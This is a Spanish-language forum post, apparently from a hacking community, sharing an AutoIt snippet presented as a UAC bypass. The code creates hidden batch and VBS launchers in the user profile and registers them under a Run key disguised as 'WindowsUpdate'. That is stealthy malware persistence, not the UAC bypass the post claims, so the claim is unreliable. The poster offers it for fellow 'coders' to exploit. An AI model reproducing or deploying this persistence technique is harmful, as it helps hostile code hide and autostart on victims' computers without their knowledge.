Lo mio es solo data.... Y esto es informacion "fresquita" (2 dias)....
Encontré en la web un "paper" de como pasar la UAC con [Enlace externo eliminado para invitados] (autor legend90)
Fuente:blackscripts.netif not FileExists(@UserProfileDir & "\data\Microsoft.vbs") then
Local $bat = FileOpen(@UserProfileDir & "\data\" & "start.cmd", 1)
FileWrite($bat, "@echo off" & @CRLF & "cd " & @UserProfileDir & "\data\" & @CRLF & "start " & @UserProfileDir & "\data\" & 'AutoIt3.exe "done.txt"')
FileClose($bat)
Local $vbs = FileOpen(@UserProfileDir & "\data\Microsoft.vbs", 1)
FileWrite($vbs, 'const Hidden = 0' & @CRLF & 'const WaitOnReturn = true' & @CRLF & 'File ="""' & @UserProfileDir & "\data\" & 'start.cmd"""' & @CRLF & 'set WshShell = CreateObject("WScript.Shell")' & @CRLF & 'WshShell.Run file, Hidden, WaitOnReturn' & @CRLF & 'wscript.quit')
FileClose($vbs)
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", "WindowsUpdate", "REG_SZ", @UserProfileDir & "\data\Microsoft.vbs")
Else
EndIf
Espero nuestros coders sepan entender esto y eventualmente si es verdad que hace lo que dice nos beneficiemos todos con esto....